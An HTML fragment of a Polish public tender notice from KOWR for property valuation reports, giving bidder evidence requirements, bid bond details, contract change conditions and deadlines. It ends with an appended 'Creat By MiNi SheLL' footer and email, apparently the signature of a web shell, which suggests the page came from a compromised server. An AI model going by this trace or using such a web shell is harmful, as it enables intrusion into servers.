jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający, przed wyborem najkorzystniejszej oferty, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na dzień złożenia, dokumentu: <br/>1.	w zakresie spełnienia warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym przez Wykonawcę prowadzącego działalność gospodarczą lub zawodową – dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania. W przypadku gdy dokument ten jest tożsamy z dokumentem wskazanym w rozdziale XI pkt 1.5. SWZ, Wykonawca składa dokument, o którym mowa w rozdziale XI pkt 1.5. jednokrotnie, z zastrzeżeniem, że powinien on być sporządzony nie wcześniej niż 3 miesiące przed jego złożeniem; <br/>2.	w zakresie spełnienia warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej [Wykonawcy zobligowani są do złożenia poniższych dokumentów wraz z ofertą]: <br/>2.1. wykazu usług potwierdzającego należytą realizację 50 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych, wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Warunek zostanie uznany za spełniony wówczas, gdy Wykonawca wykaże należyte wykonanie 50 (słownie: pięćdziesięciu) operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych w ramach jednej lub kilku umów. Wzór wykazu usług stanowi załącznik nr 3 do SWZ, <br/>2.2.	dowodów określających, czy usługi, o których mowa w pkt 6.2.1., zostały wykonane należycie, przy czym tymi dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, <br/>2.3.	wykazu osób oraz dowodów potwierdzających kwalifikacje personelu realizującego przedmiot zamówienia w zakresie kompetencji, o których mowa w pkt 1.4.2. rozdziału VIII SWZ, przy czym tymi dowodami są właściwe świadectwa, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu osób stanowi załącznik nr 7 do SWZ. <br/>UWAGA: W przypadku, gdy wartość wykonanych usług wyrażona była w innej walucie niż złoty (PLN), Wykonawca podaje wartość wykonanych usług w PLN ustaloną na dzień wykonania usługi (z dokładnością do dwóch miejsc po przecinku) po średnim kursie ogłoszonym przez Narodowy Bank Polski z dnia wykonania robót, a jeżeli w tym dniu kursu nie ogłoszono, to według tabeli kursów średnich NBP ostatnio przed tą datą ogłoszonych.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 2 300,00 zł (słownie: dwa tysiące trzysta złotych 00/100).<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach, tj.: <br/>2.1. pieniądzu; <br/>2.2. gwarancjach bankowych; <br/>2.3. gwarancjach ubezpieczeniowych; <br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3.	W przypadku wnoszenia wadium w pieniądzu, wadium należy wpłacić przelewem na rachunek bankowy Zamawiającego nr: 61 1130 1150 0012 1278 7820 0001 (dla przelewów zagranicznych w PLN - IBAN): PL 61 1130 1150 0012 1278 7820 0001; SWIFT CODE: GOSKPLPW z dopiskiem „Wadium do zabezpieczenia oferty złożonej przez ……., znak sprawy: KRA.WOP.260.1.2022.BM”. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Ten sam Wykonawca może<br/>być członkiem tylko jednej grupy Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>2. Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i do zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>3. Postanowienia SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej Umowy w<br/>stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku<br/>wystąpienia co najmniej jednej okoliczności wymienionej w ust. 2.<br/>2. Zmiana terminu realizacji Umowy, którego podstawą są:<br/>1) zmiany spowodowane warunkami atmosferycznymi uniemożliwiającymi terminowe wykonanie<br/>Umowy oraz siłą wyższą;<br/>2) zmiany będące następstwem konieczności wprowadzenia zmian w zakresie wyceny z<br/>przyczyn nieleżących po stronie Wykonawcy;<br/>3) zmiany będące następstwem wstrzymania realizacji przedmiotu Umowy na skutek działania<br/>osób trzecich;<br/>4) zmiany będące następstwem działania organów administracji, a w szczególności:<br/>a) przekroczenie określonych przez prawo terminów wydawania przez osoby trzecie wypisów,<br/>wyrysów, opinii, decyzji, zaświadczeń itp. skutkujące niemożnością wykonania zamówienia,<br/>b) przystąpienie do opracowania nowego planu zagospodarowania przestrzennego lub studium<br/>uwarunkowań i kierunków zagospodarowania przestrzennego gminy;<br/>5) zmiany będące następstwem przyczyn niezależnych od Zamawiającego i Wykonawcy, które<br/>zostaną udokumentowane;<br/>6) zmianą zakresu/rodzaju/typu wycen wskazanych w załączniku nr 2 do Umowy jeżeli<br/>konieczność zmiany Umowy w tym zakresie spowodowana jest okolicznościami, których<br/>Zamawiający, działając z należytą starannością, nie mógł przewidzieć.<br/>3. W przypadkach wymienionych w ust. 2 Zamawiający może wyznaczyć nowy termin realizacji<br/>Umowy odpowiedni do zaistniałych okoliczności, potwierdzony na piśmie.<br/>4. Zamawiający dodatkowo przewiduje możliwość następujących zmian:<br/>1) zmiana wynagrodzenia w wysokości odpowiadającej cenie za wycenę nieruchomości<br/>wycofanej z przedmiotu zamówienia, niezależne od Wykonawcy służąca celowemu<br/>wydatkowaniu środków. W takim przypadku przewidywane jest proporcjonalne do powierzchni<br/>zmniejszenie wynagrodzenia.<br/>2) zmiana zakresu wyceny niepowodująca zmiany wynagrodzenia, a wynikająca z okoliczności<br/>ustalonych w procesie wyceny.<br/>3) odstąpienie od wykonania operatu na skutek przystąpienia przez gminę do opracowania<br/>nowego MPZP lub studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy<br/>lub inne okoliczności niezależne od woli Stron Umowy, w szczególności będące skutkiem<br/>działań lub zaniechań podmiotów trzecich;<br/>4) zmian zlecenia będących konsekwencją braku możliwości dokonania lustracji nieruchomości<br/>niezawinionej przez Wykonawcę.<br/>Szczegółowe informacje w zakresie zmian umowy oraz warunków ich wprowadzenia zawierają<br/>Projektowane postanowienia umowy stanowiące złącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Zamawiającego - https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-28 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Kwota, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia wynosi: 195 367,05 zł brutto

Creat By MiNi SheLL
Email: jattceo@gmail.com